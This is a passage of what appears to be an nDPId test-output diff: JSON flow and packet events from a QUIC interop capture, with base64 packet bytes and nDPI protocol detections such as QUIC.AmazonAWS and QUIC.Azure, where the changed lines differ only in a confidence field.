/UbYOmk2NYvlK5HnPtbkhJY\/IiZ7z23icAn3thnf9kKY5ERwFbNb\/un4e9T0EmsPw2t0OaIH16APDL4fOPl6+1VOOMCOqaajX6JJ\/\/VzPWdr3Gs+W1hKm0IJjwEBhbsb4P0Y6VCEvVHsNI7mTVZMkEAua9fwXy2V4utejHZLSRSgMPQJSvLG25D\/bKthcwd1lVPwIPmwpCJB1fyQWm6AhqFghO9Zupebv0zgTmzy1tLUnzVFLEzE4ypNxUpFeb7gzSfiS6a7+MCybpQYls379X4F53iU+GTINzG20LYm+XcA+4YEJemBM6vBH5vOwhicXfh\/S4xBSLLLmN+mSkM6sSSr11u3IsDj4PDyBLrk0cKt+Xez\/nYA53eqNQH8wobiK\/1UcQl+9e0C3Q5AQcsBs2MRhY6nnaLEFqMO55ANIVeq58cAWZ8Kve4BjvDSY3uaBdKWaqONn49IjBfiSMz4x\/Xbh8S6vECtoIhrWF90MTfHWh3iWZB5qXTSIFhe9owOmMU\/Usk6Uy8KzZy7KTlRZYfDqKbq7rcX5VnkanJDx7H6mBhnkfHnaTIQA9b0kFHyqiee8gwXA7SB4zEGStKbfX+Xbd7g69KwswEs89ObtiGhZFpjbWTpwnRcI37GAOjv5pgd2XQz9GL44DG\/Ek00OMz6SwbWFlAmxoWux+qNRG3HPl83lY7zEH0gjFnGpuAsctOGn\/CIgy+CcWiM9zeH
26eSXIULjy6o2ia6cosWL5oxm4nSmaOz1jSNsNYx\/IuznZBNLujicdVabLMIwM5jHV5RNtJl7ORe2vMsPayIVVzDvXWDnuN4jRMZKSKWRDE7oTL2N532z74L8ugCqSdHwRCSsBvtnIezk0Djtg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1603816434699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434699,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAFhRAAEAR9f7AqAGAEr1U9dUqEVIE7BnSwAoKCgoIQzGFVS1wWEYAAETSpZ4u7UFA8Ku9qqY5kvFyNpSxiT1VV17cPvqBwMv7ghXKw28SABJKpVUQZhos8gZxtncfEnCPtRM8w32S0cMZDs5YJHMDp+qFqUFXljAhASDeFUYMjqqmqK2xXAN3z8w3vQiOdFiUtKcYWIVDP\/7fu1wx3cHjtnddQmoALaCYC2KIbsUH1tUKq7vT\/+BVt77LwCKryVjemBqkvXXluDjghTk40ivSQ8jJyGleEHicaKXla1GVH498NloK14kN7wg0ok7tb2sKhAfFsmt0dyCnuo0IC82\/BgTcTshonNbNn8yhRQBgaJANTlBk2qWY0ux\/DsdHPsovpEqFcqjpqtsKjJ\/5p6SGXORi9dQLphct9xf1v+6F1wTFVWPe3eHdsSOyp\/BwELawr\/f5+1egKWq7+4mbOVH+FCDZRkNVIFyH23guM2L5ae29avq\/lWL8pVDtTjf8abgfWtxqcSisE4YkAeGaq1eE5OG55ZyClHKNDn4L9XZjjbN9CQ1GCe\/OFVXpMI2PfEiWcGmIKeNgYRq4gzlAZODLuPV4QBEq7ZKp+5NVSaLqgSfrcH6xV4wE+0j7r5VEhvr2u6n\/\/bPNSsyoQaXU5+q7Q0w0lQEj77lMwQmrPw8Gljv7480G9NdUwkd\/\/p5S1RtQdUh\/qH46a+7aNhOrRHoFY0Uu4OeMbqyUyS5uevO+F6ddSemZlHL7dBD608g5QoisaEMsylH8q+6GxQ3RHsnKKd6RLtVMJcIb3s7eslhdiZb
kyC8WugF1Uqbss8ag8jYafm2G3uWVNTOT2Al+MzrSr8taRs+g5iy1aJrDEMOzdQltsGCgG+PytPM2beF4Lq0IbrxQNCgE5IJ8\/Y9zeDmnJ4YuPZxOPAfYb360+E01gUjgcPnkzGMH3BDGaQWI5R9EypmAunCrFBomcVpqmknXQt3kkvX2OcNmQNIJtzXRbps8SEeNZRyPGf\/u+Vt+vdAKZlK9BUH2ROm9VEktt\/tTi8rHZSmWXH5uaAhoAcd2e3heLdg8ch4sYkqsJ1RM4Bd84Sjoz2WT\/JoF5Jn56aKdYJgDXqR10AhI9yS7PKXqAOUJVXWVnPWUzccZcD251mjyMn\/3GgjEsaksW4aLFNi7f\/QSOqeUIKFWMvnizPSh25WGY5rgFsH51tkf6hz04KlSxRXrJr0LIOYpZWWk4Z9QNd1K7akZKN59RDZMEAAGot\/SFcMVuXXKWbOlkRF3PR6IvnUq9PUtkadRAtAQNhw2A0EhGpp4ig24HdCqTnTlX+RSyn91Y962otVZtd4BhAeT6BQzG7\/NfJ9QU0qM31UlaB1H0R3mj33T6fLRu\/gftOixAPS4oO8hH1yfhcS8101GVhNDngCpOFPDr4rVR5IXS0BzEmSymuwkNKBp\/eXteAUsH19jQgtpJlB\/27Cf644Gbzfhi6gaDA1HPNpmXHxNHTWNp3TatC1i7mgiF\/z3wnwpcgZfu7NgfWsvkOlTH1JrhvlpguHwOE8X6csJxnEP2vFDhgFZ6S\/l6TWUOJpertvpldvGLMawH9EAcvDIDM+HIUbHJDdTMzgDd9oEnVJHFpIlh0JUOzKA7NaFr5ofLRvRbxomK6JpYR2wIpU\/OYM3aMfHBOnsu4q\/k76iU5zYtsHGX5zTrd9syVHbfA=="} -01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434699,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1603816434705,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1603816434705,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA3PkpAAOIRsJYocL88wKgBgBFRtfAAI3\/u0QAAAAAACFIdWLoQ6nMg\/wAAIP8AAB06SjrK"} 
00640{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1603816434707,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434707,"pkt":"pJGxgjQ5PKn0qB\/sht1gB7v\/BNgRQCABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUr3wRUgTYXLjHCgoKCgi+3m+0woW7wAAARL68vqjG4rI\/AvdsCirEkqkyqlwlEk0N+rawpRZGeCeIU2ZO32fsIEz3GXMviYe+v0IBqeytpgNCeytK9t+KOjotJ7QVqpveJICd7IlMjO1HSAYVU5lRgXMoT+y5Fi2RUxr4qo\/CS3kZAFjeRFuCIjbZwm3OtOHC+vVlVA\/Vw\/zluUbCb4Z9OC05o\/XWJAPFWPOrEt8\/bTpMWLzNYr6bh2AAai1D3O2xoHVdm8ri3GSO8bUq2pxMjIn3ptNmbrkSU87wQZXGqhVeWh1ZsC0DBFqUluwXb0pMgCqpEO80Nhq5+u4y4i3hGodT0H1FKzVcs3ew3eq9vaguwDBdaKE4exJJv6RCncKSyg4heYydolHckhPW\/oY2HqheA4pFoO8ZtX95wKBFjVm9bJpYTJJY\/z31z+aUhWVmurEfLmnYxlCSy12hLAruC+gNCD8kQ\/MW4jyBAG6d7BTS1znq6T231\/W7l3AXMCvXfMcFqFuj+gmi\/S9kywNWZ1fPa34hHlg7mTIWR7jlUo6tzEfq2oqDEs+5yTslMb5FZJK8ldyYKgyBcGRm4I\/ToW88j5u17EMJLsfUqwGMs8bmd2UsI3BzwJywAmNYdLVpOCfPHEMiC8WRAAlJ3Q+5SLhd9OVFXGtu7O6XRhOsbmI08WdrJBm5J9ucdgzWkbl3i\/2eDZiYxTYiiBKrxh1bpbDEXg0VTkBcE5jASPmJB6nxZm61WNxz7BBfHP5VadrI26UgUPsDMVwEUXD\/xbFcS2J1PJleFnNI2j+1DmMCTg5N9ExM1u3\/T+Y0uyk6l54KxtzqSgjBsg\/XhFcM\/ODubgSuXCIsXFgZYQWz
YGSVjfGtlg9HMWTHqZ2juNRwZqE5L2Y1hMws3fsY1ili8zQQG6pzQd9m5PP\/4DGWVRfKxQ1ZOXjzlNFvAo1T8tuTM\/f+7uMOnSwbTJyF4JRbDwJLDbu2BiW4DyD++iUHI1TX2h0xwwlOfDtDU\/XKqzZV94CRnghKvgLSuVmReTC4nhbhAh1QzzHb4eVcBbud+vGs+t+FDW0s9Oe\/hnHEEnZnUGinZBTzGSWQRNGZp3cg0jUT4QPjdPy8XyC\/POLdeCDrPUB9mDaW3W7rOPVTXvP4IQV+x5zM0ESasNezQs+QGprgL1EDIBS8hvpGgXPlFZ33Fo7w2YppnMED08hMlvAS6uJ4t8YNFbTXcL5HnggJFHBH27Bm3yvE8hbfH6SwVufZ8xM+Tw3qfg4V3lxg8P8AwO4P99Fk6O5149Oq6tAEtMX+WnBYLaxWrBiKCCuc5plEPAU9\/ZoPaf8l47lpmb56KdTriyN73TanAKwfbP6jIuj4uNIxQka2RGbqyo\/uLCe+FVRjf9R6E7hPl6i9FsmDl51lDdfvDGWrftns8EcWHuJT1pCO7UIHJob2JLCsxavgPAwXAF3a5o1+uVFCKwWrw3snRqgYx5CEEXaScXy50PTK\/knIkowD2tWEjgiJ8xxxjFamG8tuawm7Urqq2+BqDf1V3I5W+o4QxOSaFEJ\/SP7Wg3EEs5WP\/+ds9hapCjPQlUIlkyNKi8R+ri6pcpgmc2WXtbdLyKWIrR+mhOTL4VpBkPN\/EhoXvYOWO65B7Ac2ZRH43fZmgo68Sg=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434707,"flow_last_seen":1603816434707,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434707,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1603816434709,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1603816434709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA7AABAABwRNNgSvVT1wKgBgBFRqdMAJz2HgAAAAAAACN6xPRoCi6ch+s6wAvrOsAH\/AAAd\/wAAGw=="} 
02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1603816434719,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAschAAEARJZfAqAGAg58YxobPAbsE7L65wQoKCgoIJv2XczUh4RIAAETSm4e+jGeUlE\/B12fljD+RqcpH47cYVTGlgRrNPB1pt4i\/tbOCC9Ip3Az5ZlXd\/FK3y+qA0RLTj+Hs3M0j8vRCArTbVM4C5NgRxsbhmviOgStjfj9\/bYsZv\/EjOBw1tJ7JBggMh5UbD2IApoVeQbXiGPK49HtmmZ2e8vNh\/DENBlDkfNiA\/Ze5qo3h724av1SIVZrOuvswt3oWie0bK5Roue+xJHmSYlIdNZfnzXpwBh7c35jaMUWDvYBeZmckm7kJc\/YlpNj25UQZsKAQzZSxGyFkwPWE1VZIIf2sR\/CiM5RFNmS8PgkHq67u5CQ3Sonb6Zl53+rO66OPeJhUkGQNaSql8mMy7iu+inJtNa+Jv8r+Mk+hsReHOd3O8emp6fJ1y9UM73fh5DirDtvnZZ3V6jRJ2r4Rygc+0kMBn4CyZ+getScc\/+R2siF\/4EkcSN\/DfCIEwaf5cBdqU7sUr9jhm8ebduyUf8MMp0mo8YLH5Ld6gayewdIiX7e5MgOtKMtgw+6gQh+Bv2MsHuSZkTMTDQf6U2V6WVpP0Y9J+TKxzWfaCPfnLyfJhAvO09EXRL4v5CauDRrgK66O64n5FFSoPkt\/cTCu2ZrnJUnl73ZUh5IMHcF5qrpyNgwYRdzmLOBKKUcbZsDmgTWWmVQic025bFbbeJANUemP9rPrhK8vpdcFoj5tc09KJOg24DVw0N\/8s0k41J4q5XkRqvAq3Jh031h89LKhx6BQhfHBc1CWUzEmpurvpV2Ys4EtVyEOa76yxKI9JcwQIwxvIQGEJ9wsNhbJGOcCGN65fV293I4+Q6O6oqi3DRDkz7R3WSxRmE3ALQUURzNbLPzkf5OpbRxMjRgBCXiLLxDLAMGYwM3F2kI+ZHH4x55d95IB1d\/psHRZShyVEYlzUKCnwu29d26MEawfpZVAaMzVRo7xXV35ZRY1D8\/9qSuz0fyLsjjlwkVcHKzvWu8cUA31sZxhNy8BdqKz2pVYPgrewKlXoKgRl99L31koA071JJjVhvzH\/gU32UecgmYeQp250l9S+wco1ff4R4UyUmOfphDkNe9Tg\/fRpjxgKleIR8kU42W8ME9YzuK+U6l+SwzLtodLt+wCvEs\/5vVCJoajkAEX1WivqyUrV84SFPKxXwpiL7TWr5xgs9A6ntAG+LEQ4Fzm\/5n84NssQOABVYGxSC+XA8kEi5T+j7oP5Z\/shgDlJzIXGmWwZLuGT\/FxXFjW5dDx3DqqqjLeUaGgzxk\/EyBCH1h+zMLqNGXZu5UCHMlMD0h27AhID+7gDIkyKn3TFzqvA52QgVRJ5KzL9Mb0vBqkit66U3SK0k0xi\/SfXE85fTw0NQH2x4wd\/v387iGFuVPBH6D0J7PwX5flRLQgBtOy5jnJbhc6rzs0BouQP8a1FymWYQx9YUWzK8DXbNzSVWzXnmMxjgztNz1o7b+kh5m6wUcvmLd6ZGQW6FIkZrd0dtEs\/RrJ1+OEeg0MfVSwR9Ik1PmVJoBjjnS
VS\/EB5t+GQt0btx30I4eSEVuRu2nS\/9zrg3dvua9zEzH6y3wCr08vFuCZT1u8r3v5iOQmHyKv5pfKvsINf\/+Z3UqZAAlmAb7gj\/svvnlt+IBIlM\/2nf4NpSTCux5l816mDS9Bl2mt29n21gH0vw=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAzsFAAEARXhTAqAGAilu8k5wnAbsE7JrHxQoKCgoIhyfaf9ET5OIAAETSThHzecvOQHDw4M1KEvEdEUCr7CAD3OCoyACaSfQrzochTChRx6wrvVz+n+iOMS1T7uOrLABH\/lkEcgzaWAuVRzM5GGhP0QAKdeAxNm0AsijqoG67hGFscKpx5Av3K9sq9rDX7Y\/VGCtKE++QbiaTUGCfsHrykmsrI7QPeSxlf3ybNOigAkts1eOpMwz25k+b9PnMwdGgxKqc+p7n+EcjPFQejHtIcCrVrKASMN5dFF0N\/aceKWgkpv55cG51Qbpmor1iK5rkX+Jp2MWmVKxJJKA6VEfDmOs8+rh9\/bYDHg0cT0TQf4Zr2hLCg6RgKQkQcpxpjnqjjVnWbgl6v1vpjXEkfqOp6LQ7SyRj3OKJU+CC+q8T3ZrAxjtbgQTH6BSqNj5efXKABdLu2ZE9S1a376exw1gxC4aD7EfQxqzjGirRnUARwvI2VMbxxc2dHnrZzXTVUrVa81Vp5nVMETLO1bny7V5SddubE07uIzwFndMmsYTjkTJwD5XPAMks1RFaNVtVW04V3zer0QaCSFmPpOrKA2ENZYUXRl+1Ms5r0ujaH\/BvGzVlt7DDNrWHHosR4VC\/ma1LSnbA+WH2DeEaYdOBu9k38i9r4ijFtLZ3F8QT0b+bWuRxlbf8JzOO6XJygAjh4eIcY9Ifn6Ag7e30VziB3U79j2fB4F\/Mt+Uv+l2lFBFVyIRYWLQl09QlzkOdaohOuoVGT+vunC1+0eAqFF3oxCobr0gBT9\/9LcLUFdypCpP4\/Sw
PWvfF+zqYocBjePElav4+tGCKrt\/mkRyKvh\/nYulR4dFSm9pIzgjYoT78ZAE2lNPXyk6\/wkm6W4x\/Hk6rPPDi5szKTPrrB0V1qBTNahyFnb9FvHoXB4fK89PmOZMp\/yecWo4kP\/4lCl\/0sXffd\/0V5mQwriutI7UUKJmZLeDjdWC8J0aU6CLm\/SAEqxf88fV5pVMs0AYkAPp\/9j6IANm3UDJnqgRh8cV1\/31bcLPsjWchpJZggmMYkHI2wDN3Sl9zv+cjKCe7+jCl4jW8L\/ekF6HvMfC0eZ4nbal4FyAx8lo4Ue7X8ccf91\/AaqxYlfnlLzjGSpAQtt5baUgZHgnmszaHCnFbo2HHjdmmeu9Y473RvYemO3l50MKmLZG8lmdXQYv688u9bT4irxXqmbHi\/KHwUDOgFg0j8s0Y\/EmH\/pUgZCvgDFCtWtE6OW\/Hyq+5Cq\/HLgwB+IqdME7iVh3EnO3YfKXA50YgeqN5yY5ZNK6jO6v4bbk7\/wLtWdLdrB98VjrtJxA3EfSPn3vx7DFBmIWTYqLE+TpavUx0HxH19PjHereWaV9o6Cgs6+3PWf4tHc03d1rwK6f0xuBoogN97dsTvTJpqwpURumirQKVo3x+5CvP7oOU957Rt\/07vk0ZfIXTZECv+R5Y+R5gZfgoFzxzcENMe3qIbQZk8PFnchoS4GL\/8Y3H5Zb9Ei56qun9YxSW1Biasm72GWT1NwX2gR1bQjPxGosYAY\/6xPeLmkDAtOOTQ4g1vxcLLP8ZY+VaGsUNC8YbA40ig6LjBd1CD5E8RiAqEa9E2sD4lNd4+rToxZT0gmByW82p\/TzmPxSzryYrUGNjoU4d233l88kz7+WQyjC7tX8oBOiRLI2cu8Cgzkq+Qerk7O1ahg=="} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1603816434721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434721,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApPtAAEARh9rAqAGAilu8k8YREVIE7C6GxwoKCgoI6izyia7+eS8AAETSt+QbRbxl9Fm+cZhPehbbyuY4X98qiUiG97DtvQxOnW4mI8Cl3JV0HG80thoAdqQu1a\/K85y1Ygj5RP4637KMtJIeTQw7yPPnXHP0zU4RjZ62TRhNYZ6eNVI8rDTqX1U17UTGdzCJDQ6P3bwSFn\/hecgMOHAgJBSmXtzvmrL3MX129OuthefAiwdrij8dlZ+1POyInLQ1s4zElf1Qtel5JDZstCNGEQMu3Yksb7Fp8N8QxRhMiYahy\/rNZuX1sDo+S8Kt0f4nxECcA68o5O3j7RZ0UkQbCk7TY7P0k6hNhGbG8k6dzns2FDeBH2AWR18Xa6EbgQ+OE51BsT69F5Mw6Qv4zVxrj3nvm+j8ViswJ2lGHUVv\/wERdeEUkom6scesBC8GBF5oO+ERsonLbBlk0k64qeF0Mq16CQ2Tk4A1XJsEkeKkk13FfpgZ4xmju7ZvBKg6vyEj2GwP\/prZKaMYyek4cy3+1jkURWmaCVIJ30zt\/SxehiygkHDUiHnhD4bbKnxoZnxLWYNZlzO2olSPOXGBVUKEmol6Z1tK9f9JtrTB1m6tWsGbvwGSZA1y816T1+9q3kC45+v+o6ZmsHQTQIKTABYPnt8Wtf0hV33bQFBnhVsk2Gxdzjdom1ZLnDG+UAt4D1lf5cwBPUEisJIkPJBWS+rRvxC4DSNxciNVRjBHHot+7iiljC6QJOc8tv9ovBuMSSgCyDMe9n6HZtnwKuFrJijK9sqICpmLcJkRKxtUrOmfIadJlbAhdaPlAaOtL\/gMLjBp5boNC8pc8oLdF5gMKu0u6JrSWcFM7DMe\/SsSxMHlXi6oim5b0Bp8EthbxMMoLevrzbay70814zyI4WTOGY9vs32q1YnE4xZtSITnSbueYtYs5y6gAD+78I0tPBp\/bsV8QK5jclDqhGJvB+AVr\/WiMRT4OB9wSBwZXgYvAqWVfPSOkoHm3S6eJCcDs9F2x+hzEigXYsc84EvM4A1FCIAV7dO57go8nEQBW53ScAoMrWnMLYP0jkSI6suyGhiNp+h\/hClT+r\/Op92bWLS0pmZuvcNoTh4NLNKHapDtFwkQScIFRJ5B3b8fbGgludLcc2EtUA94Vc8